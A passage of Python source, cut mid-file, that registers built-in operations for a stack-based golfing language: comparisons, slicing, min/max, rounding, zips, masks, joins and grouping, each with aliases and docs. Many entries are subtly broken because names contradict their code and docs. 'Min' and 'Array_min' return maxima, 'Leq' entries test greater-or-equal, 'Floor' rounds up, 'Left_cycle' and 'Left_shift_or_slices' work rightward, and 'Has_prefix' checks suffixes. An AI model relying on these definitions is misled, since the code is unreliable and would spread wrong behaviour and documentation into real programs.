pykey(value))]),\n Case.str2(lambda env, a, b: [int(a < b)]),\n Case.list2(lambda env, a, b: [int(pd_to_list(a) < pd_to_list(b))]),\n Case.number_seq(lambda env, n, seq: [pd_slice(seq, None, n)]),\n Case.block_seq_range(lambda env, block, seq:\n [pd_take_drop_while(env, block, pd_deref(seq))[0]]),\n ],\n docs=\"\"\"On two numbers, two strings, or two lists, compare if the\n first is less than the second. On a number and a sequence, slice\n elements with index less than the number, as Python s[:n]. On a\n sequence (numbers coerce to ranges) and a block, \"take while\", or\n return the longest prefix of elements that all satisfy the\n block.\"\"\",\n stability=\"beta\")\n cput('Gt_or_slice', ['>'], [\n Case.number2(lambda env, a, b: [int(num.pd_num_cmp(a, b) > 0)]),\n Case.hoard_immutable(lambda env, hoard, value: [hoard.slice(pykey(value), None)]),\n Case.str2(lambda env, a, b: [int(a > b)]),\n Case.list2(lambda env, a, b: [int(pd_to_list(a) > pd_to_list(b))]),\n Case.number_seq(lambda env, n, seq: [pd_slice(seq, n, None)]),\n Case.block_seq_range(lambda env, block, seq:\n [pd_take_drop_while(env, block, pd_deref(seq))[1]]),\n ],\n docs=\"\"\"On two numbers, two strings, or two lists, compare if the\n first is greater than the second. On a number and a sequence, slice\n elements with index greater than or equal to the number, as Python\n s[n:]. On a sequence (numbers coerce to ranges) and a block, \"drop\n while\", or return the suffix starting with the first element that\n fails to satisfy the block.\"\"\",\n stability=\"beta\")\n cput('Leq_or_slice', ['e'], [\n Case.number2(lambda env, a, b: [int(num.pd_num_cmp(a, b) >= 0)]),\n Case.str2(lambda env, a, b: [int(a >= b)]),\n Case.list2(lambda env, a, b: [int(pd_to_list(a) >= pd_to_list(b))]),\n Case.number_seq(lambda env, n, seq: [pd_slice(seq, n, None)]), # TODO: ?\n ],\n docs=\"\"\"Greater than or equal to.\"\"\",\n stability=\"beta\")\n cput('Lt_approx', ['a'], [\n Case.number2(lambda env, a, b:\n [int(num.numerify(b) - num.numerify(a) < env.get_epsilon())]), # type: ignore\n ],\n docs=\"\"\"Approximately greater than; tolerance is given by Ep,\n epsilon\"\"\",\n stability=\"alpha\")\n cput('Eq_approx', ['=a'], [\n Case.number2(lambda env, a, b:\n [int(abs(num.numerify(a) - num.numerify(b)) < env.get_epsilon())]), # type: ignore\n ],\n docs=\"\"\"Approximately equal than; tolerance is given by Ep,\n epsilon\"\"\",\n stability=\"alpha\")\n cput('Min', ['m', 'Ã'], [\n Case.value2(lambda env, a, b: [pd_max(a, b)]),\n Case.value2_block(lambda env, a, b, f: [pd_max(a, b, (env, f))]),\n ],\n docs=\"\"\"Maximum of two values, optionally by a block\"\"\",\n stability=\"beta\")\n cput('Median_of_three', ['=m'], [\n Case.value3(lambda env, a, b, c: [pd_median_of_three(a, b, c)]),\n Case.value3_block(lambda env, a, b, c, f: [pd_median_of_three(a, b, c, (env, f))]),\n ],\n docs=\"\"\"Median of three values, optionally by a block\"\"\",\n stability=\"alpha\")\n cput('Array_min', ['r', 'Æ'], [\n Case.seq(lambda env, e: [pd_max_of_seq(e)]),\n Case.block_seq_range(lambda env, f, e: [pd_max_of_seq(e, (env, f))]),\n ],\n docs=\"\"\"Maximum of array, optionally by a block (numbers will\n coerce to ranges if you supply a block). Mnemonic: it's like\n reducing by maximum of two values.\"\"\",\n stability=\"beta\")\n cput('Array_median', ['=r'], [\n # TODO: True median should try to take the average of two elements\n Case.list_(lambda env, x: [pd_to_sorted(x)[len(x)//2]]),\n Case.str_(lambda env, s: [Char(sorted(s)[len(s)//2])]),\n ], docs=\"Median of array\", stability=\"alpha\")\n cput('Compare', ['Co', '˜'], [\n Case.number2(lambda env, a, b: [num.pd_num_cmp(a, b)]),\n Case.str2(lambda env, a, b: [num.any_cmp(a, b)]),\n Case.list2(lambda env, a, b: [num.any_cmp(pd_to_list(a), pd_to_list(b))]),\n ],\n docs=\"\"\"Compare (-1, 0, or 1)\"\"\",\n stability=\"alpha\")\n cput('Array_minima', ['rs', 'Æs'], [\n Case.seq(lambda env, e: [pd_maxima_of_seq(e)]),\n Case.block_seq_range(lambda env, f, e: [pd_maxima_of_seq(e, (env, f))]),\n ],\n docs=\"\"\"Maxima of array, optionally by a block (numbers will\n coerce to ranges if you supply a block).\"\"\",\n stability=\"alpha\")\n cput('Min_deep_vectorizing', ['mw', 'Ãw'], [\n Case.value2(lambda env, a, b: [pd_deepvectorize_nn2v(pd_max, a, b)]),\n ],\n docs=\"\"\"Maximum of two values; deeply vectorizes.\"\"\",\n stability=\"unstable\")\n\n cput('Lt_length', ['l'], [\n Case.number2_len(lambda env, a, b: [int(num.pd_num_cmp(a, b) > 0)]),\n ],\n docs=\"\"\"Greater than, after coercing two arguments to ints or\n floats, sequences by taking their length.\"\"\",\n stability=\"unstable\")\n cput('Eq_length', ['=l'], [\n Case.number2_len(lambda env, a, b: [int(a == b)]),\n ],\n docs=\"\"\"Equal to, after coercing two arguments to ints or floats,\n sequences by taking their length.\"\"\",\n stability=\"unstable\")\n cput('Leq_length', ['el'], [\n Case.number2_len(lambda env, a, b: [int(num.pd_num_cmp(a, b) >= 0)]),\n ],\n docs=\"\"\"Greater than or equal to, after coercing two arguments to\n ints or floats, sequences by taking their length.\"\"\",\n stability=\"unstable\")\n cput('First_duplicate', ['=g'], [\n Case.seq(lambda env, s: [\n second_or_error(pd_first_duplicate(s),\n \"Duplicate not found in First_duplicate\")]),\n ],\n docs=\"\"\"Find the first element that appears a second time in a\n sequence.\"\"\",\n stability=\"unstable\")\n # }}}\n # Shifting and slicing {{{\n left_shift_case = Case.number2(lambda env, a, b: [num.pd_lshift(a, b)])\n right_shift_case = Case.number2(lambda env, a, b: [num.pd_rshift(a, b)])\n cput('Left_shift', [], [left_shift_case],\n docs=\"\"\"Bitwise left shift\"\"\",\n stability=\"beta\",\n golf_aliases=['s'])\n nonempty_left_slices_case = Case.seq_deref(\n lambda env, seq: [[seq[:n+1] for n in range(len(seq))]])\n nonempty_right_slices_case = Case.seq_deref(\n lambda env, seq: [[seq[n:] for n in range(len(seq) - 1, -1, -1)]])\n from_empty_left_slices_case = Case.seq_deref(\n lambda env, seq: [[seq[:n] for n in range(len(seq) + 1)]])\n from_empty_right_slices_case = Case.seq_deref(\n lambda env, seq: [[seq[n:] for n in range(len(seq), -1, -1)]])\n def nonempty_slices_func(env: Environment, seq: PdImmutableSeq) -> List[PdObject]:\n return [[seq[lo:hi]\n for lo in range(len(seq))\n for hi in range(lo + 1, len(seq) + 1)]]\n nonempty_slices_case = Case.seq_deref(nonempty_slices_func)\n\n cput('Left_slices', [], [nonempty_left_slices_case],\n docs=\"\"\"Left slices (nonempty, by increasing length)\"\"\",\n stability=\"alpha\",\n golf_aliases=['s'])\n\n cput('Left_shift_or_slices', ['s'], [\n nonempty_right_slices_case, right_shift_case,\n ],\n docs=\"\"\"{{ 'Right_shift'|b }} on numbers, {{ 'Right_slices'|b }} on\n a sequence\"\"\",\n stability=\"alpha\")\n\n cput('From_empty_left_slices', ['«s'], [\n from_empty_left_slices_case,\n ],\n docs=\"\"\"Left slices (including the empty one, by increasing\n length)\"\"\",\n stability=\"alpha\")\n\n cput('From_empty_right_slices', ['»s'], [\n from_empty_right_slices_case,\n ],\n docs=\"\"\"Right slices (including the empty one, by increasing\n length)\"\"\",\n stability=\"alpha\")\n\n nonempty_slices_range_case = Case.seq_range_deref(nonempty_slices_func)\n\n cput('All_slices', ['=s', '§'], [nonempty_slices_range_case],\n docs=\"\"\"All slices of a sequence (numbers coerce to ranges).\"\"\",\n stability=\"unstable\")\n\n cput('Left_cycle', ['c'], [\n Case.str_number(lambda env, seq, n: [seq[-num.intify(n):] + seq[:-num.intify(n)]]),\n Case.list_range_number(lambda env, seq, n: [pd_to_list(pd_slice(seq, -num.intify(n), None)) + pd_to_list(pd_slice(seq, None, -num.intify(n)))]),\n ],\n docs=\"\"\"Right cycle a list or string by some number of elements,\n which are cut off the right and reattached to the left.\"\"\",\n stability=\"unstable\")\n\n cput('Index_cyclically', ['=c'], [\n Case.number_seq(lambda env, n, seq: [pd_index(seq, num.intify(n) % len(seq))]),\n ],\n docs=\"\"\"Index into a list cyclically, by taking the index mod the\n length of the list.\"\"\",\n stability=\"unstable\")\n\n cput('Left_cycle_one', ['o'], [\n Case.str_(lambda env, seq: [seq[-1:] + seq[:-1]]),\n Case.list_int_range(lambda env, seq: [list(seq[-1:]) + list(seq[:-1])]),\n ],\n docs=\"\"\"Right cycle a list or string Once: move the last element to\n the first.\"\"\",\n stability=\"unstable\")\n\n cput('Has_prefix', ['h'], [\n Case.list2_singleton(lambda env, a, b: [int(pd_to_list(a)[-len(b):] == pd_to_list(b))]), # TODO could be optimized\n Case.seq2_singleton(lambda env, a, b: [int(env.pd_str(a).endswith(env.pd_str(b)))]),\n ],\n docs=\"\"\"Test if the first argument has a suffix equal to the second\n argument (numbers coerce to single-element lists; if at least one\n argument is a string, both coerce to strings).\"\"\",\n stability=\"unstable\")\n def has_infix(env: Environment, a: Union[list, range, Hoard], b: Union[list, range, Hoard]) -> List[PdObject]:\n a = pd_to_list(a)\n b = pd_to_list(b)\n return [int(any(a[i:i+len(b)] == b for i in range(len(a) - len(b) + 1)))]\n cput('Has_infix', ['=h'], [\n Case.list2_singleton(has_infix),\n Case.seq2_singleton(lambda env, a, b: [int(env.pd_str(b) in env.pd_str(a))]),\n ],\n docs=\"\"\"Test if the first argument has a substring equal to the\n second argument (numbers coerce to single-element lists; if at\n least one argument is a string, both coerce to strings).\"\"\",\n stability=\"unstable\")\n # }}}\n # Incr/Decr/First/Last/Uncons/Unsnoc/Parens: «»‹›() {{{\n def case_add_const(i: int) -> Case:\n return Case.number(lambda env, a: [num.pd_add_const(a, i)])\n\n decr_case = case_add_const(-1)\n incr_case = case_add_const(1)\n decr2_case = case_add_const(-2)\n incr2_case = case_add_const(2)\n\n cput('Decr', [], [decr_case ], docs=\"Decrease by 1.\", stability=\"beta\", golf_aliases=['('])\n cput('Incr', [], [incr_case ], docs=\"Increase by 1.\", stability=\"beta\", golf_aliases=[')'])\n cput('Decr_two', [], [decr2_case], docs=\"Decrease by 2.\", stability=\"beta\", golf_aliases=['«'])\n cput('Incr_two', [], [incr2_case], docs=\"Increase by 2.\", stability=\"beta\", golf_aliases=['»'])\n\n uncons_case = Case.seq(lambda env, a: [pd_butfirst(a), pd_first(a)])\n cput('Uncons', [], [uncons_case],\n docs=\"\"\"Split into tail and first.\n\n ex: [1 2 3]Uncons => [2 3]1\"\"\", stability=\"beta\",\n golf_aliases=['('])\n unsnoc_case = Case.seq(lambda env, a: [pd_butlast(a), pd_last(a)])\n cput('Unsnoc', [], [unsnoc_case],\n docs=\"\"\"Split into init and last.\n\n ex: [1 2 3]Uncons => [1 2]3\"\"\", stability=\"beta\",\n golf_aliases=[')'])\n modify_first_case = Case.block_seq_range(lambda env, b, seq: [pd_modify_index(env, b, pd_deref(seq), 0)])\n modify_last_case = Case.block_seq_range(lambda env, b, seq: [pd_modify_index(env, b, pd_deref(seq), -1)])\n\n cput('Modify_first', [], [modify_first_case],\n docs=\"\"\"Run a block over the first element of a list, then replace\n it in the list with the result.\"\"\",\n stability=\"beta\",\n golf_aliases=['('])\n cput('Modify_last', [], [modify_last_case],\n docs=\"\"\"Run a block over the last element of a list, then replace\n it in the list with the result.\"\"\",\n stability=\"beta\",\n golf_aliases=[')'])\n\n cput('Decr_or_uncons_or_modify_first', ['('],\n [decr_case, uncons_case, modify_first_case],\n docs=\"\"\"{{ 'Decr'|b }} or {{ 'Uncons'|b }} or\n {{ 'Modify_first'|b }}.\"\"\",\n stability=\"beta\")\n cput('Incr_or_unsnoc_or_modify_last', [')'],\n [incr_case, unsnoc_case, modify_last_case],\n docs=\"\"\"{{ 'Incr'|b }} or {{ 'Unsnoc'|b }} or\n {{ 'Modify_last'|b }}.\"\"\",\n stability=\"beta\")\n\n first_case = Case.seq(lambda env, a: [pd_first(a)])\n last_case = Case.seq(lambda env, a: [pd_last(a)])\n butlast_case = Case.seq(lambda env, a: [pd_butlast(a)])\n butfirst_case = Case.seq(lambda env, a: [pd_butfirst(a)])\n first_and_last_case = Case.seq(lambda env, a: [pd_index(a, 0), pd_index(a, -1)])\n\n cput('First', [], [first_case], docs=\"First of sequence\", stability=\"stable\", golf_aliases=['‹'])\n cput('Last', [], [last_case], docs=\"Last of sequence\", stability=\"stable\", golf_aliases=['›'])\n cput('Butlast', ['(s'], [butlast_case], docs=\"All but last of sequence\", stability=\"beta\")\n cput('Butfirst', [')s'], [butfirst_case], docs=\"All but first of sequence\", stability=\"beta\")\n cput('First_and_last', [], [first_and_last_case], docs=\"First and last of sequence\",\n stability=\"alpha\")\n\n floor_case = Case.number(lambda env, a: [num.pd_floor(a)])\n ceil_case = Case.number(lambda env, a: [num.pd_ceil(a)])\n round_case = Case.number(lambda env, a: [num.pd_round(a)])\n\n cput('Floor', ['i'], [ceil_case ], docs=\"Round up to the nearest integer.\", stability=\"beta\", golf_aliases=['›'])\n cput('Round', ['=i'], [round_case], docs=\"Round to the nearest integer; follows Python's rules.\",\n stability=\"alpha\")\n\n cput('Floor_or_first', ['‹'], [floor_case, first_case],\n docs=\"\"\"{{ 'Floor'|b }} or {{ 'First'|b }} of sequence or\n {{ 'Modify_first'|b }}\"\"\",\n stability=\"beta\")\n cput('Ceiling_or_last', ['›'], [ceil_case, last_case],\n docs=\"\"\"{{ 'Ceiling'|b }} or {{ 'Last'|b }} of sequence or\n {{ 'Modify_last'|b }}\"\"\",\n stability=\"beta\")\n\n cput('Decr_two_or_but_last', ['«'], [decr2_case, butlast_case],\n docs=\"\"\"Decrease by two, or all but last\"\"\",\n stability=\"beta\")\n\n cput('Incr_two_or_but_first', ['»'], [incr2_case, butfirst_case],\n docs=\"\"\"Increase by two, or all but first (tail)\"\"\",\n stability=\"beta\")\n\n cput('Round_or_first_and_last', ['¤' ], [round_case, first_and_last_case],\n stability=\"alpha\")\n\n cput('Complement_parity', ['~p'], [\n Case.value_n2v(lambda e: num.pd_xor_const(e, 1))\n ],\n stability=\"alpha\")\n # }}}\n # Sum, Product, etc {{{\n cput('Sum', ['Š', '+w'], [\n Case.seq_range(lambda env, x: [pd_deep_sum(x)]),\n ],\n docs=\"(Deep) sum (coerces numbers to range).\", stability=\"beta\")\n cput('Product', ['Þ', '*w'], [\n Case.seq_range(lambda env, x: [pd_deep_product(x)]),\n ],\n docs=\"(Deep) product (coerces numbers to range!?).\", stability=\"alpha\")\n cput('Deep_length', ['Dl'], [\n Case.value(lambda env, x: [pd_deep_length(x)]),\n ],\n docs=\"Deep length.\", stability=\"unstable\")\n cput('Average', ['Av'], [\n Case.seq_range(lambda env, x: [pd_deep_average(x)]),\n ],\n docs=\"Average (deep).\", stability=\"alpha\")\n cput('Standard_deviation', ['Sg'], [\n Case.seq_range(lambda env, x: [pd_deep_standard_deviation(x)]),\n ],\n docs=\"Standard deviation (deep). Mnemonic: sigma\", stability=\"alpha\")\n cput('Hypotenuse', ['Hy'], [\n Case.seq_range(lambda env, x: [pd_deep_hypotenuse(x)]),\n ],\n docs=\"Hypotenuse (square root of sum of squares; deep).\",\n stability=\"alpha\")\n # }}}\n # M for Minus (negate) and Mold {{{\n negate_case = Case.number(lambda env, a: [num.pd_mul_div_const(a, -1, 1)])\n mold_case = Case.value_seq(lambda env, x, y: [pd_mold(x, y)])\n memoize_case = Case.block(lambda env, b: [MemoizedBlock(b)])\n cput('Negate', [], [negate_case],\n docs=\"Negate a number.\", stability=\"beta\",\n golf_aliases=['M'])\n cput('Mold', [], [mold_case],\n docs=\"Mold the first sequence like the second.\", stability=\"alpha\",\n golf_aliases=['M'])\n cput('Mold_fill', ['Mf'], [Case.value_seq(lambda env, x, y: [pd_mold_fill(x, y)])],\n docs=\"\"\"Repeat the first element as many times as needed to mold a\n sequence like the second.\"\"\", stability=\"alpha\")\n cput('Memoize', ['Memo'], [memoize_case],\n docs=\"Memoize a block.\", stability=\"alpha\",\n golf_aliases=['M'])\n cput('Negate_or_mold_or_memoize', ['M'], [negate_case, memoize_case, mold_case],\n docs=\"\"\"{{ 'Negate'|b }} a number, or {{ 'Mold'|b }} a sequence\n like another, or {{ 'Memoize'|b }} a block.\"\"\",\n stability=\"alpha\")\n # }}}\n # U for Signum, Uniquify, Until {{{\n signum_case = Case.number(lambda env, a: [num.pd_signum(a)])\n uniquify_case = Case.seq(lambda env, a: [pd_seq_uniquify(a)])\n until_case = Case.block2(lambda env, cond, body:\n pd_while_then_empty_list(env, cond, body, negate=True))\n cput('Signum', [], [signum_case],\n docs=\"Signum of a number (-1, 0, 1) by sign.\", stability=\"beta\",\n golf_aliases=['U'])\n cput('Uniquify', [], [uniquify_case],\n docs=\"\"\"Uniquify a sequence: drop all but first occurrence of each\n element\"\"\",\n stability=\"alpha\",\n golf_aliases=['U'])\n cput('Until', [], [until_case],\n docs=\"\"\"Until loop: Execute first block, pop, stop if true, execute\n second block, repeat.\"\"\",\n stability=\"alpha\",\n golf_aliases=['U'])\n cput('Signum_or_uniquify_or_until', ['U'], [signum_case, uniquify_case, until_case],\n docs=\"Signum or uniquify or until. Mnemonic: U for Unit\",\n stability=\"alpha\")\n # }}}\n # Has as factor / count {{{\n cput('Count_maybe_factors', ['#'], [\n Case.number2(lambda env, a, b: [num.pd_count_multiplicity_in(b, a)]),\n Case.seq_value(lambda env, s, x: [pd_count_in(env, x, s)]),\n Case.block_seq_range(lambda env, b, s: [pd_count(env, b, s)]),\n ],\n docs=\"\"\"Count factor multiplicity, frequency, or number satisfying\n predicate. Mnemonic: number sign, as in you're counting the number\n of something\"\"\",\n stability=\"beta\")\n cput('Count_pairs', ['#p'], [\n Case.seq(lambda env, seq: [pd_count_pairs(seq)]),\n ],\n docs=\"\"\"Given a sequence, return a list of pairs, each pair with\n a distinct element and the number of times it appears in the\n sequence.\"\"\",\n stability=\"alpha\")\n cput('Most_frequent', ['#æ'], [\n Case.seq(lambda env, seq: [pd_most_frequent(seq)]),\n ],\n docs=\"\"\"Most frequently appearing element.\"\"\",\n stability=\"alpha\")\n cput('Least_frequent', ['#œ'], [\n Case.seq(lambda env, seq: [pd_least_frequent(seq)]),\n ],\n docs=\"\"\"Least frequently appearing element.\"\"\",\n stability=\"alpha\")\n # }}}\n # Down/Do, Transpose, Zip {{{\n reverse_case = Case.seq_range_deref(lambda env, a: [a[::-1]])\n doloop_case = Case.block(lambda env, body: pd_do_then_empty_list(env, body))\n cput('Reverse', ['Down'], [reverse_case, doloop_case],\n docs=\"\"\"Reverse a sequence (coerces numbers to range).\"\"\",\n stability=\"beta\",\n golf_aliases=['D'])\n cput('Doloop', [], [doloop_case],\n docs=\"\"\"Do loop: execute the block, then pop an element, and repeat\n until the popped element is falsy.\"\"\",\n stability=\"beta\",\n golf_aliases=['D'])\n cput('Reverse_or_doloop', ['Down_or_doloop', 'D'], [reverse_case, doloop_case],\n docs=\"\"\"On a number of a sequence, {{ 'Reverse'|b }}; on a block,\n {{ 'Doloop'|b }}.\"\"\",\n stability=\"beta\")\n cput('Reverse_one_or_map', ['Ð'], [\n Case.number(lambda env, n: [range(num.intify(n), 0, -1)]),\n Case.seq_range(lambda env, a: [pd_map_reverse_singleton(a)]),\n ],\n docs=\"\"\"On numbers, reverse inclusive range from that number to\n 1 (i.e. {{ 'Range_one_down'|b }}). On sequences, reverse each element\n (numbers coerce to length-1 lists, and characters coerce to\n length-1 strings, so you can also use this to wrap each element of\n a flat list into a list). (Heavily inspired by studying\n 05AB1E.)\"\"\",\n stability=\"alpha\")\n cput('Palindromize', ['Pz'], [\n Case.seq_range(lambda env, a: [pd_palindromize(a)]),\n ],\n docs=\"\"\"Concatenate a with the tail of its reverse.\"\"\",\n stability=\"alpha\")\n cput('Rectangularize', ['Qz'], [\n Case.seq_value(lambda env, a, f: [pd_rectangularize_fill(a, f)]),\n ],\n docs=\"\"\"Rectangularize a matrix: append the filler element as\n necessary to rows until the matrix is rectangular. Mnemonic: Q for\n Quadrangle.\"\"\",\n stability=\"alpha\")\n cput('Rectangularize_with_space', [' q'], [\n Case.seq(lambda env, a: [pd_rectangularize_fill(a, Char(' '))]),\n ],\n docs=\"\"\"Rectangularize a matrix with spaces: append the space\n character as necessary to rows until the matrix is rectangular.\n Mnemonic: Q for Quadrangle.\"\"\",\n stability=\"alpha\")\n cput('Transpose', ['Tt', '™'], [\n Case.seq(lambda env, a: [pd_transpose(a)]),\n ],\n docs=\"\"\"Transpose a matrix, or list of lists. Mnemonic: matrices\n are transposed by a superscript T, so Tt is just that \"doubled\" and\n ™ is \"Transpose Matrix\" superscripted.\"\"\",\n stability=\"beta\")\n cput('Rotate', ['Ro'], [\n Case.seq(lambda env, a: [pd_transpose(a)[::-1]]),\n ],\n docs=\"\"\"Rotate a matrix, or list of lists, 90 degrees\n counterclockwise (just by vague mathematical convention of\n angle).\"\"\",\n stability=\"alpha\")\n cput('Unrotate', ['Ur'], [\n Case.seq(lambda env, a: [pd_transpose(pd_deref(a)[::-1])]),\n ],\n docs=\"\"\"Rotate a matrix, or list of lists, 90 degrees clockwise\n (just by vague mathematical convention of angle).\"\"\",\n stability=\"alpha\")\n cput('Transpose_fill', ['Tf'], [\n Case.seq_value(lambda env, a, f: [pd_transpose_fill(a, f)]),\n ],\n docs=\"\"\"Given a filler element, transpose a matrix, or list of\n lists, with the filler element repeated as necessary until the\n matrix is rectangular.\"\"\",\n stability=\"alpha\")\n cput('Transpose_fill_with_space', [' t'], [\n Case.seq(lambda env, a: [pd_transpose_fill(a, Char(' '))]),\n ],\n docs=\"\"\"Transpose a matrix, or list of lists (or of strings),\n adding the space character as necessary until the matrix is\n rectangular.\"\"\",\n stability=\"alpha\")\n cput('Zip', ['Zp'], zip_cases,\n docs=\"\"\"Zip two sequences (numbers coerce to ranges), returning a\n list of length-2 lists; or zip them with a block, which operates on\n corresponding pairs of the two lists. Truncates to the length of\n the shorter input sequence. Also see {{ 'zip'|it }}, and\n {{ '‰'|b }} for an alias.\"\"\",\n stability=\"alpha\")\n cput('Ziplongest', ['Zl'], [\n Case.seq2_range(lambda env, a, b: [pd_ziplongest_as_list(a, b)]),\n Case.seq2_range_block(lambda env, a, b, block: [pd_ziplongest(env, block, a, b)]),\n ],\n docs=\"\"\"Zip two sequences (numbers coerce to ranges), returning a\n list of length-2 or (at indices between their lengths, if the\n sequences are of unequal length) length-1 lists; or zip them with a\n block, which operates on corresponding pairs of the two lists,\n where elements of the longer list are collected unmodified. The\n result has length equal to that of the longest list.\"\"\",\n stability=\"alpha\")\n cput('Autozip', ['Az'], [\n Case.seq_range(lambda env, seq: [pd_sliding_window_seq(seq, 2)]),\n Case.block_seq_range(lambda env, block, a: [pd_autozip(env, block, a)]),\n ],\n docs=\"\"\"Collect the list of adjacent pairs of elements of a list\n (coerces numbers to ranges); or map a block across these pairs,\n which is equivalent to zipping the list with its own tail.\"\"\",\n stability=\"alpha\")\n cput('Loopzip', ['Oz'], [\n Case.seq2_range(lambda env, a, b: [pd_loopzip_as_list(a, b)]),\n Case.seq2_range_block(lambda env, a, b, block: [pd_loopzip(env, block, pd_deref_to_iterable(a), pd_deref_to_iterable(b))]),\n ],\n docs=\"\"\"Zip two sequences (numbers coerce to ranges), returning a\n list of length-2 lists; or zip them with a block, which operates on\n corresponding pairs of the two lists. The result has length equal\n to that of the longest list; the shorter list, if one exists, is\n looped until it is the right length. Mnemonic: O looks like a\n loop.\"\"\",\n stability=\"alpha\")\n\n pow10_case = Case.number(lambda env, n: [10 ** num.numerify(n)])\n cput('Power_of_ten', [], [pow10_case], stability=\"alpha\", golf_aliases=['€'])\n\n mask_case = Case.seq2_range(lambda env, seq1, seq2: [pd_mask(seq1, seq2)])\n cput('Mask', [], [mask_case],\n docs=\"\"\"Mask: Zip two sequences and filter for elements of the first\n where the corresponding elements of the second are truthy.\"\"\",\n stability=\"alpha\", golf_aliases=['€'])\n bimask_case = Case.seq2_range(lambda env, seq1, seq2: [\n pd_mask(seq1, seq2, negate=True), pd_mask(seq1, seq2)])\n cput('Bimask', [], [bimask_case],\n docs=\"\"\"Bimask: Zip two sequences and push two filtered versions of\n the first sequence, one of elements where the corresponding\n elements of the second are falsy, and one of the remaining.\"\"\",\n stability=\"alpha\", golf_aliases=['¥'])\n\n cput('€', [], [pow10_case, mask_case],\n docs=\"\"\"{{ 'Power_of_ten'|b }} or {{ 'Mask'|b }}. Mnemonics: E for\n exponent, the one in scientific notation, or the powers of ten in\n the relatively European metric system; or € has the = like\n indexing; it's indexing by a list of booleans.\"\"\",\n stability=\"unstable\")\n cput('¥', [], [bimask_case],\n docs=\"\"\"{{ 'Bimask'|b }}. Mnemonics: like {{ '\\u20ac'|b }} but it\n \"forks\" the sequence into two instead of just having the truthy\n ones.\"\"\",\n stability=\"unstable\")\n # }}}\n # Matching prefixes, mismatched suffixes {{{\n cput('Matching_prefix', ['Shared_prefix', 'Ys', 'Ym'], [\n Case.seq2_range(lambda env, s1, s2: [pd_matching_prefix(s1, s2)]),\n ],\n docs=\"\"\"Find the longest prefix shared between two sequences.\n Mnemonic for this and related operations: Y is a fork where the\n bottom is the shared prefix and the top are the diverging\n suffixes. 's' is for same or shared.\"\"\",\n stability=\"alpha\")\n cput('Mismatch_suffixes', ['Yd'], [\n Case.seq2_range(lambda env, s1, s2: pd_mismatch_suffixes(s1, s2)),\n ],\n docs=\"\"\"Find the suffixes after the longest prefix shared between\n two sequences. Mnemonic for this and related operations: Y is a\n fork where the bottom is the shared prefix and the top are the\n diverging suffixes. 'd' is for different or diverging.\"\"\",\n stability=\"alpha\")\n cput('Mismatch_index', ['Yi'], [\n Case.seq2_range(lambda env, s1, s2: [pd_mismatch_index(s1, s2)]),\n ],\n docs=\"\"\"Find the length of the longest prefix shared\n between two sequences; equivalently, the index of the first element\n where they diverge, except that it'll be the length of the list if\n they are identical. Mnemonic for this and related operations: Y is\n a fork where the bottom is the shared prefix and the top are the\n diverging suffixes; 'i' is for index.\"\"\",\n stability=\"alpha\")\n cput('Mismatch_pair', ['Yp'], [\n Case.seq2_range(lambda env, s1, s2: [pd_mismatch_elements(s1, s2)]),\n ],\n docs=\"\"\"Find the first elements after the longest prefix shared\n between two sequences. Returns a list. If the two sequences are\n equal, the list will be empty. If one sequence is a proper prefix\n of the other, the list will just have one element (and you won't be\n able to tell which sequence it came from). Mnemonic for this and\n related operations: Y is a fork where the bottom is the shared\n prefix and the top are the diverging suffixes; 'p' is for pair,\n which the return value usually is.\"\"\",\n stability=\"alpha\")\n cput('Mismatch_former', ['Yf', 'Ya'], [\n Case.seq2_range(lambda env, s1, s2: [pd_mismatch_element(0, s1, s2)]),\n ],\n docs=\"\"\"Given two sequences, find the first element in the first\n sequence that isn't at the corresponding index in the second.\n Errors if there isn't such an element. Mnemonic for this and\n related operations: Y is a fork where the bottom is the shared\n prefix and the top are the diverging suffixes; 'f' is for 'former'\n / 'a' is the first letter of the alphabet.\"\"\",\n stability=\"unstable\")\n cput('Mismatch_latter', ['Yl', 'Yb'], [\n Case.seq2_range(lambda env, s1, s2: [pd_mismatch_element(1, s1, s2)]),\n ],\n docs=\"\"\"Given two sequences, find the first element in the second\n sequence that isn't at the corresponding index in the second.\n Errors if there isn't such an element. Mnemonic for this and\n related operations: Y is a fork where the bottom is the shared\n prefix and the top are the diverging suffixes; 'l' is for 'latter'\n / 'b' is the second letter of the alphabet.\"\"\",\n stability=\"unstable\")\n # }}}\n # Reduce/join {{{\n cput('Reduce', ['R'], [\n Case.seq2_singleton(lambda env, seq, joiner: [pd_join(env, seq, joiner)]),\n Case.block_seq_range(lambda env, block, seq: [pd_reduce(env, block, seq)]),\n ],\n stability=\"beta\")\n line_join_case = Case.seq_range(lambda env, seq:\n ['\\n'.join(env.pd_str(e) for e in pd_iterable(seq))])\n cput('Line_join', ['\\nr', '\\\\nr'], [line_join_case],\n docs=\"Join with newlines\",\n stability=\"beta\")\n cput('Ŋ', ['\\x0e'], [line_join_case],\n docs=\"Unstable aliases for {{ 'Line_join'|b }}.\",\n stability=\"unstable\")\n cput('Space_join', [' r'], [\n Case.seq_range(lambda env, seq: [' '.join(env.pd_str(e) for e in pd_iterable(seq))]),\n ],\n stability=\"beta\")\n cput('Comma_join', [',r'], [\n Case.seq_range(lambda env, seq: [','.join(env.pd_str(e) for e in pd_iterable(seq))]),\n ],\n stability=\"unstable\")\n # }}}\n # G for Gcd or group, and friends {{{\n cput('Group', [], [\n Case.seq(lambda env, seq: [pd_group(seq)]),\n ],\n docs=\"\"\"Group into runs of equal elements.\n\n ex: [3 1 2 2 1 1 1]G => [[3][1][2 2][1 1 1]]\"\"\",\n stability=\"beta\",\n golf_aliases=['G'])\n cput('Group_by', [], [\n Case.block_seq_range(lambda env, block, seq: [pd_group_by(env, block, seq)]),\n ],\n docs=\"Group into runs of equal elements according to the block\",\n stability=\"beta\",\n golf_aliases=['G'])\n cput('Gcd', [], [\n Case.number2(lambda env, a, b: [num.pd_gcd(a, b)]),\n ],\n stability=\"beta\")\n cput('Group_maybe_by', ['G'], [\n Case.seq(lambda env, seq: [pd_group(seq)]),\n Case.number2(lambda env, a, b: [num.pd_gcd(a, b)]),\n Case.block_seq_range(lambda env, block, seq: [pd_group_by(env, block, seq)]),\n ],\n docs=\"\"\"GCD; group like elements of a sequence, possibly under a\n mapping.\"\"\",\n stability=\"beta\")\n cput('Lcm', [], [\n Case.seq(lambda env, seq: [functools.reduce(num.pd_lcm, pd_flatten_to_int_char_generator(seq)) if len(seq) else (Char(1) if seq == \"\" else 1)]),\n Case.number2(lambda env, a, b: [num.pd_lcm(a, b)]),\n ],\n stability=\"unstable\",\n docs=\"\"\"LCM of two numbers, or of a list, deeply.\"\"\")\n\n cput('Organize', [], [\n Case.seq(lambda env, seq: 